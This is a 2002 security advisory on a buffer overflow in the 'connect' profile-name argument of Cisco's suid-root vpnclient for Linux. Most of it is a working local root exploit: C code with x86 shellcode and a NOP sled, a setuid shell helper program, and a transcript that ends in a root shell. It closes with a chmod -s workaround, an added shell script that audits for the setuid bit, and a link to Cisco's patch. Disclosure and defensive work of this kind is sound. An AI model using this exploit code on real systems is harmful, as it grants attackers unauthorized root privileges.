
Cisco vpnclient for Linux local root exploit
20th Jun 2002 [SBWID-5471]
COMMAND

	Cisco vpnclient for Linux local root exploit

SYSTEMS AFFECTED

	vpnclient-linux-3.5.1.Rel-k9 and perhaps earlier versions

PROBLEM

	From methodic's AngryPacket Security advisory [http://methodic.angrypacket.com],
	written with the help of dmuz and vegac, and also shok of w00w00
	[http://sec.angrypacket.com] [0x0002]:
	

	Any local user can gain root privileges via a buffer overflow in the
	'connect' argument when a long profile name (520 bytes to own the eip)
	is specified and the executable is suid root.
	

	Cisco's install script installs vpnclient suid root by default, although
	it does advise administrators about the permissions set on vpnclient and
	that they may wish to change them.
	

	

	 Exploit
	 =======

	/* buffer overflow for cisco's vpnclient for linux
	   tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz

	   to get this to properly work, you need to put the following code into
	   xx.c, compile it (as xx), and place the executable into /tmp (to bypass
	   tight PAM restrictions)

	   #include <stdio.h>
	   main() {
	     setuid(0);
	     execl("/bin/sh", "sh", NULL);
	   }

	   then compile this and run it. syntax is ./vpnclient <offset>
	   tested under gentoo linux and debian:
	   $ ls -la `which vpnclient`
	   -rws--x--x    1 root   root   160900 Apr 13 22:34 /usr/local/bin/vpnclient
	   $ ./vpnKILLient 
	   addr: 0xbffffbac, offset: 0
	   Cisco Systems VPN Client Version 3.5.1 (Rel)
	   Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
	   Client Type(s): Linux
	   Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686

	   sh-2.05a# id
	   uid=0(root) gid=100(users) groups=100(users),10(wheel)

	   greetz: all of the angrypacket crew (of course)
	           shok  -> pheerable^2;
	           vegac -> 31336++;

	   when you get a chance, check out http://sec.angrypacket.com
	*/

	#include <stdio.h>
	#include <stdlib.h>   /* atoi, malloc */
	#include <string.h>
	#include <strings.h>  /* bzero */
	#include <unistd.h>

	#define NOP 0x90
	#define LEN 620 /* 520 to own eip */

	/* shellcode by vegac (setuid(0)->/tmp/xx) */
	/* won't work if your /tmp partition is mounted noexec or nosuid */
	char shell[]=
	        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
	        "\x31\xc0\x50\x68\x2f\x2f\x78\x78"
	        "\x68\x2f\x74\x6d\x70\x89\xe3\x31"
	        "\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
	        "\x0b\xcd\x80\x00";

	/* current stack pointer, used as the base for the guessed address */
	unsigned long get_sp (void) {
		__asm__("mov %esp,%eax");
	}

	int main(int argc, char *argv[]) {

		int i, offset=0;
		long addr;
		char *buf, *ptr;

		if(argc > 1) offset = atoi(argv[1]);

		buf = (char *)malloc(sizeof(char) * LEN);
		bzero(buf, LEN);
		addr = get_sp() - offset;
		printf("addr: 0x%x, offset: %d\n", addr, offset);

		/* fill the whole buffer with the guessed address */
		for(i = 0; i < LEN; i += 4) {
			*(long *)&buf[i] = addr;
		}

		/* first half becomes a NOP sled */
		for(i = 0; i < (LEN / 2); i++) {
			*(buf + i) = NOP;
		}

		/* shellcode sits at the end of the sled */
		ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
		for(i = 0; i < strlen(shell); i++) {
			*(ptr++) = shell[i];
		}
		buf[LEN - 1] = '\0';

		/* pass the buffer as the profile name of the 'connect' command */
		execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);
		return(0);

	}

	

SOLUTION

	 Workaround

	 ==========

	

	chmod -s vpnclient
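As an added example from the defender's side (not part of the advisory, and not Cisco's installer or code), a POSIX shell script that checks whether vpnclient is installed setuid and, on request, applies the chmod -s workaround above. The default path /usr/local/bin/vpnclient is the one shown in the exploit transcript; the `fix` argument and the function names are this script's own conventions. list_suid goes a step beyond the advisory and lists every setuid file below a directory, so the same check can be run over an install tree.

```shell
#!/bin/sh
# Added example, not from the advisory: audit the setuid bit the Cisco
# installer sets on vpnclient, and apply the advisory's workaround on request.

# Print "suid", "nosuid" or "missing" for FILE; return 0, 1 or 2 respectively.
suid_status() {
    if [ ! -f "$1" ]; then
        echo missing
        return 2
    fi
    if [ -u "$1" ]; then      # POSIX test: setuid bit is set
        echo suid
        return 0
    fi
    echo nosuid
    return 1
}

# Owner name of FILE taken from ls -l (avoids GNU-only stat flags).
file_owner() {
    ls -ld "$1" | awk '{print $3}'
}

# List regular files below DIR that carry the setuid bit, one per line.
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# audit_vpnclient [PATH] [report|fix]
# Reports the setuid state of PATH (default: the install path from the
# advisory) and, with "fix", strips the bit exactly as the workaround does.
audit_vpnclient() {
    path=${1:-/usr/local/bin/vpnclient}
    action=${2:-report}
    status=$(suid_status "$path") || :   # non-zero status is data, not an error
    case $status in
        missing) echo "$path: not installed"; return 0 ;;
        nosuid)  echo "$path: setuid bit not set (workaround in place)"; return 0 ;;
    esac
    echo "$path: setuid bit set, owner $(file_owner "$path"), mode $(ls -ld "$path" | awk '{print $1}')"
    if [ "$action" = fix ]; then
        chmod -s "$path" && echo "$path: setuid bit removed (chmod -s)"
    fi
}

# Stand-alone use: sh audit.sh [PATH] [report|fix]
audit_vpnclient "$@"
```

Run it as root with `fix` on a real install to strip the bit; without arguments it only reports. Removing the setuid bit means vpnclient must then be run by root (or via sudo), which is the trade-off the workaround accepts.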
	

	 Patch

	 =====

	

	See:
	

	http://www.cisco.com/warp/public/707/cisco-unix-vpnclient-buffer-overflow-pub.shtml

	

	
